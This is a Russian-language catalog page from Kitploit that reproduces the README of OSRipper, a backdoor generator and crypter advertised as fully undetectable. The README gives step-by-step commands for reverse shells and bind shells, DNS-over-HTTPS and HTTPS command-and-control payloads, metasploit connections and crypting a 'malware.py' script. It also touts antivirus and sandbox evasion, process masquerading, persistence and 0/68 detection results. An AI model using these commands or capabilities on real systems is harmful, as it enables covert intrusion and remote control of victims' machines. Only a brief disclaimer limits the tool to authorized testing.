Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OSRipper — Кроссплатформенный фреймворк для создания бэкдоров и криптеров с обходом антивирусов и интегрированным легковесным веб-интерфейсом. | Kitploit
Инструменты/GitHubGitHub/noahoksuz/osripper
Фреймворки для эксплойтовГенерация полезной нагрузкиОбход IDS/IPSПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
GitHubnoahoksuz/osripper

OSRipper

Кроссплатформенный фреймворк для создания бэкдоров и криптеров с обходом антивирусов и интегрированным легковесным веб-интерфейсом.

Репозиторий
32850586 месяцев назадПроверено Kitploit
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

Продвинутый кроссплатформенный генератор полезных нагрузок и криптер с возможностями FUD

Возможности • Быстрый старт • Веб-интерфейс • Типы полезных нагрузок • Документация


Обзор

OSRipper — это сложный, полностью необнаруживаемый (FUD) генератор бэкдоров и криптер, предназначенный для авторизованного тестирования на проникновение и операций «красных команд». Он использует передовые методы уклонения, несколько типов полезных нагрузок и современный веб-интерфейс C2 для управления скомпрометированными системами.

Ключевые особенности

  • Полностью необнаруживаемый (FUD) — передовые методы уклонения обходят современные антивирусные решения
  • Веб-интерфейс C2 — современная панель управления для активных сессий
  • Несколько типов полезных нагрузок — обратные и прямые оболочки, DoH C2, HTTPS C2 и другие
  • Многоуровневое запутывание — стандартное и расширенное запутывание с рандомизированными переменными
  • Компиляция в бинарник — компиляция полезных нагрузок в отдельные исполняемые файлы
  • Шифрование каналов связи — SSL/TLS и HTTPS C2 с привязкой сертификата
  • Скрытные возможности — обнаружение виртуальных машин, антиотладка, маскировка процессов

Возможности

Генерация полезных нагрузок

Тип нагрузкиОписаниеСценарий использования
Bind ShellОткрывает порт на машине жертвыПрямой доступ, когда обратные соединения заблокированы
Reverse TCP MeterpreterЗашифрованное обратное соединение через SSL/TLSСтандартное тестирование на проникновение
DNS-over-HTTPS C2Скрытый канал C2 через протокол DoHОбход сетевых ограничений
HTTPS C2HTTPS C2 с привязкой сертификатаЗащищённый, аутентифицированный канал C2
Staged PayloadМногоэтапная доставка через вебПовышенная скрытность развёртывания
Custom Code CrypterЗапутывание любого скрипта PythonШифрование пользовательских нагрузок

Методы уклонения

  • Расширенное запутывание — многоуровневое кодирование кода со случайными переменными
  • Усиленное запутывание — антиотладка, обнаружение виртуальных машин, внедрение мусорного кода
  • Обнаружение анти-VM — уклонение от песочниц и виртуальных машин
  • Скрытные задержки — случайные задержки запуска (5-15 секунд)
  • Маскировка процессов — имитация легитимных системных процессов
  • Рандомизация сигнатур — каждая полезная нагрузка уникальна

Возможности веб-интерфейса

  • Панель сессий — просмотр всех активных сессий C2
  • Интерактивный терминал — выполнение команд через веб-интерфейс
  • Генератор нагрузок — создание нагрузок прямо из веб-интерфейса
  • Управление сессиями — просмотр информации о системе, истории команд и управление сессиями
  • Обновления в реальном времени — выполнение команд и просмотр ответов в реальном времени

Расширенные возможности

  • Интеграция с Ngrok — автоматическое создание туннеля для динамических IP
  • Привязка сертификата — безопасный HTTPS C2 с проверкой сертификата
  • Постоянство сессий — поддержание соединения после перезагрузок
  • Очередь команд — постановка команд в очередь для офлайн-агентов
  • Разбор ответов — автоматический разбор вывода команд

Быстрый старт

Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Установка зависимостей
pip3 install -r requirements.txt

# Установка пакета
pip3 install -e .

Важно — запустите настройку для дополнительных функций (ngrok, компиляция):
Во многих системах (особенно Linux с внешне управляемым окружением Python) необходимо выполнить встроенную настройку, чтобы дополнительные зависимости были установлены в собственное виртуальное окружение OSRipper. Сделайте это один раз после установки:

root@kitploit:~
osripper-cli setup

Это создаст ~/.local/share/osripper/venv, установит туда pyngrok, nuitka и sandboxed, и все последующие запуски osripper / osripper-cli будут использовать их автоматически. Без этого опции --ngrok и --compile будут запрашивать выполнение настройки. Используйте osripper-cli setup --system только если предпочитаете установку через системный/пользовательский pip вместо venv.

Базовое использование

Интерактивный режим:

root@kitploit:~
osripper
# или
python3 -m osripper

Командная строка:

root@kitploit:~
# Генерация обратной оболочки
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Генерация DoH C2 нагрузки
osripper-cli doh -d example.com --obfuscate --compile

Веб-интерфейс:

root@kitploit:~
# Запуск C2 сервера с веб-интерфейсом
python -m osripper.c2.server example.com --port 5000

# Доступ к панели по адресу http://localhost:5000

Веб-интерфейс

OSRipper включает современный веб-интерфейс C2 для управления скомпрометированными системами.

Возможности

  • Панель управления — обзор всех активных сессий
  • Управление сессиями — просмотр информации о системе и выполнение команд
  • Генератор нагрузок — создание DoH и HTTPS нагрузок через веб-интерфейс
  • История команд — отслеживание всех выполненных команд и ответов
  • Обновления в реальном времени — выполнение команд и просмотр ответов в реальном времени

Запуск C2 сервера

root@kitploit:~
# Базовое использование
python -m osripper.c2.server example.com

# С HTTPS
python -m osripper.c2.server example.com --https

# Пользовательский порт
python -m osripper.c2.server example.com --port 8080

# С пользовательским сертификатом
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Доступ к веб-интерфейсу

После запуска сервера панель управления доступна по адресам:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (если включено)

Типы полезных нагрузок

1. Bind Shell (прямая оболочка)

Открывает порт на машине жертвы и ожидает подключения.

root@kitploit:~
osripper-cli bind -p 4444 --obfuscate --compile

Подключение:

root@kitploit:~
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter (обратная оболочка)

Зашифрованное обратное соединение через SSL/TLS.

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Скрытый канал C2 через протокол DNS-over-HTTPS. Обходит многие сетевые ограничения.

root@kitploit:~
# Генерация нагрузки
osripper-cli doh -d example.com --obfuscate --compile

# Запуск C2 сервера
python -m osripper.c2.server example.com

Возможности:

  • Скрытая связь на основе DNS
  • Веб-интерфейс для управления сессиями
  • Автоматическое сохранение сессий
  • Очередь команд для офлайн-агентов

4. HTTPS C2 (с привязкой сертификата)

Безопасный HTTPS C2 с привязкой сертификата для аутентификации.

root@kitploit:~
# Генерация нагрузки (через веб-интерфейс или CLI)
# Запуск C2 сервера с HTTPS
python -m osripper.c2.server example.com --https

# Получить отпечаток сертификата
curl http://localhost:5000/api/cert-fingerprint

Возможности:

  • Привязка сертификата для безопасности
  • Зашифрованная связь по HTTPS
  • Интеграция с веб-интерфейсом
  • Управление сессиями

5. Staged Payload (многоэтапная нагрузка)

Многоэтапная доставка через веб для повышенной скрытности.

root@kitploit:~
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. Custom Code Crypter (криптер пользовательского кода)

Запутывание и шифрование любого скрипта Python.

root@kitploit:~
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Интерфейс командной строки

Общие опции

ОпцияОписание
--obfuscateВключить многоуровневое запутывание
--enhancedРасширенное запутывание (антиотладка, обнаружение VM)
--compileСкомпилировать в отдельный бинарник
--icon PATHПользовательская иконка для скомпилированного бинарника
--delayДобавить случайную задержку запуска (5-15 секунд)
--output, -o NAMEИмя выходного файла
--quiet, -qТихий режим (минимальный вывод)

Примеры

root@kitploit:~
# Полнофункциональная обратная оболочка
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# DoH C2 со всеми функциями
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# Шифрование пользовательского скрипта
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# Использование ngrok для динамического IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Результаты обнаружения

Последние сканирования VirusTotal

  • Полезная нагрузка Python: 0/68 уровень обнаружения
  • Скомпилированный бинарник: 0/68 уровень обнаружения

Результат antiscan

Antiscan Results


Архитектура

root@kitploit:~
┌─────────────────┐
│   Сгенериро-    │
│   ванный        │
│   бинарник      │
└─────────────────┘
         │
         │ Запуск
         ▼
┌──────────────────┐
│ Запутывание      │
│ Дроппер          │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 СЕРВЕР     │
│   (Веб-UI)      │
│                 │
└─────────────────┘
         │
         │ Команда/Ответ
         ▼
┌─────────────────┐
│   Агент         │
│   Выполнение    │
└─────────────────┘

Скриншоты

Главный интерфейс

Панель управления веб-интерфейса

Web UI Dashboard


Расширенная конфигурация

Интеграция с Ngrok

root@kitploit:~
# Генерация нагрузки с ngrok
osripper-cli reverse --ngrok -p 4444

# Следуйте инструкциям для настройки туннеля
# Запуск: ngrok tcp 4444

Пользовательские иконки

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

Уровни запутывания

Стандартное запутывание:

  • Многоуровневое кодирование
  • Рандомизация переменных
  • Запутывание структуры кода

Расширенное запутывание:

  • Все функции стандартного
  • Техники антиотладки
  • Обнаружение виртуальных машин
  • Внедрение мусорного кода
  • Продвинутое уклонение
root@kitploit:~
# Стандартное
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# Расширенное
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

Настройка HTTPS C2

root@kitploit:~
# 1. Запуск C2 сервера с HTTPS
python -m osripper.c2.server example.com --https

# 2. Получить отпечаток сертификата
curl http://localhost:5000/api/cert-fingerprint

# 3. Сгенерировать нагрузку с отпечатком (через веб-интерфейс)
# Или использовать отпечаток при генерации нагрузки

Документация

  • Wiki — полная документация
  • Руководство по использованию — подробные инструкции
  • Справочник API — документация для разработчиков

План развития

Завершено (v0.3.2)

  • Генерация FUD нагрузок (0/68 обнаружений)
  • Веб-интерфейс C2
  • Полезная нагрузка DNS-over-HTTPS C2
  • HTTPS C2 с привязкой сертификата
  • Многоуровневый движок запутывания
  • Система управления сессиями
  • Очередь и выполнение команд
  • Обнаружение анти-VM
  • Маскировка процессов

В разработке

  • Расширенные модули пост-эксплуатации
  • Продвинутые механизмы сохранения доступа
  • Загрузка/выгрузка файлов через веб-интерфейс
  • Поддержка нескольких пользователей для C2 сервера

Планы на будущее

  • Методы уклонения на основе ИИ
  • Инфраструктура C2 на основе блокчейна
  • Поддержка мобильных платформ
  • Продвинутые полезные нагрузки для социальной инженерии

Вклад в проект

Мы приветствуем вклад от сообщества исследователей безопасности!

Как внести вклад

  1. Форкните репозиторий
  2. Создайте ветку для функции (git checkout -b feature/amazing-feature)
  3. Зафиксируйте изменения (git commit -m 'Add amazing feature')
  4. Отправьте ветку (git push origin feature/amazing-feature)
  5. Откройте пул-реквест

Рекомендации по разработке

  • Следуйте стандартам кодирования PEP 8
  • Добавляйте докстринги ко всем функциям
  • Тестируйте на нескольких платформах
  • Убедитесь, что возможности FUD остаются нетронутыми

Благодарности

Особая благодарность сообществу исследователей безопасности и этим проектам:

  • htr-tech/PyObfuscate — вдохновение для запутывания
  • cedowens/SwiftBelt — сбор информации на macOS
  • Metasploit Framework — обработка полезных нагрузок

Юридическое заявление

ВАЖНО: Этот инструмент разработан только для образовательных целей и авторизованного тестирования на проникновение.

  • Разрешённое использование: Исследования в области безопасности, тестирование на проникновение, упражнения красных команд
  • Запрещённое использование: Несанкционированный доступ, вредоносная деятельность, незаконные цели

Разработчики не несут ответственности за неправомерное использование этого программного обеспечения. Пользователи обязаны соблюдать все применимые законы и нормативные акты.


Поддержка

  • Сообщения об ошибках: Открыть issue
  • Запросы функций: Обсуждения
  • Проблемы безопасности: Свяжитесь с сопровождающими приватно
Скачать инструмент